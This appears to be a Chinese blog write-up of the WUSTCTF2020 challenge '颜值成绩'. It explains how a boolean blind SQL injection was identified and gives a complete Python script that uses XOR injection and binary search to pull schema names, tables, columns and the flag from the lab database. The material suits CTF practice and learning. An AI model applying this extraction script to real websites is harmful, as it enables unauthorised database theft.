[WUSTCTF2020]颜值成绩

该博客介绍了如何通过布尔盲注技术来探测数据库信息。作者通过输入不同数值观察回显,确定了存在布尔盲注漏洞。然后使用Python编写脚本,通过异或注入的方式逐个猜测数据库中'flag'表的字符,最终拼接出完整的flag值。博客内容涉及SQL注入、数据库查询以及Python请求库的使用。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

知识点:布尔盲注

当我们输入1,2,3,4的时候都有回显,但是当输入5的时候会回显
在这里插入图片描述
判断布尔盲注,测试一波

这种显示不存在

1'and length(database()) >1#

当用异或注入的时候显示正确1^1^1,并回显Hi admin,这样我们就可以由此来盲注。
在这里插入图片描述

import re
import requests
import string

url = "http://ebb62726-0fba-430e-bf27-5e7214c31577.node4.buuoj.cn:81/"
flag = ''


def payload(i, j):
    # 数据库名字
    #sql = "1^(ord(substr((select(group_concat(schema_name))from(information_schema.schemata)),%d,1))>%d)^1"%(i,j)
    # 表名
    #sql = "1^(ord(substr((select(group_concat(table_name))from(information_schema.tables)where(table_schema)='ctf'),%d,1))>%d)^1"%(i,j)
    # 字段名
    #sql = "1^(ord(substr((select(group_concat(column_name))from(information_schema.columns)where(table_name='flag')),%d,1))>%d)^1"%(i,j)
    # 查询flag
    sql = "1^(ord(substr((select(group_concat(value))from(ctf.flag)),%d,1))>%d)^1" % (i, j)
    data = {"stunum": sql}
    r = requests.get(url, params=data)
    # print (r.url)
    if "Hi admin" in r.text:
        res = 1
    else:
        res = 0
    return res


def exp():
    global flag
    for i in range(1, 10000):
        print(i, ':')
        low = 31
        high = 127
        while low <= high:
            mid = (low + high) // 2
            res = payload(i, mid)
            if res:
                low = mid + 1
            else:
                high = mid - 1
        f = int((low + high + 1)) // 2
        if (f == 127 or f == 31):
            break
        # print (f)
        flag += chr(f)
        print(flag)


exp()
print('flag=', flag)

得到flag
在这里插入图片描述

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值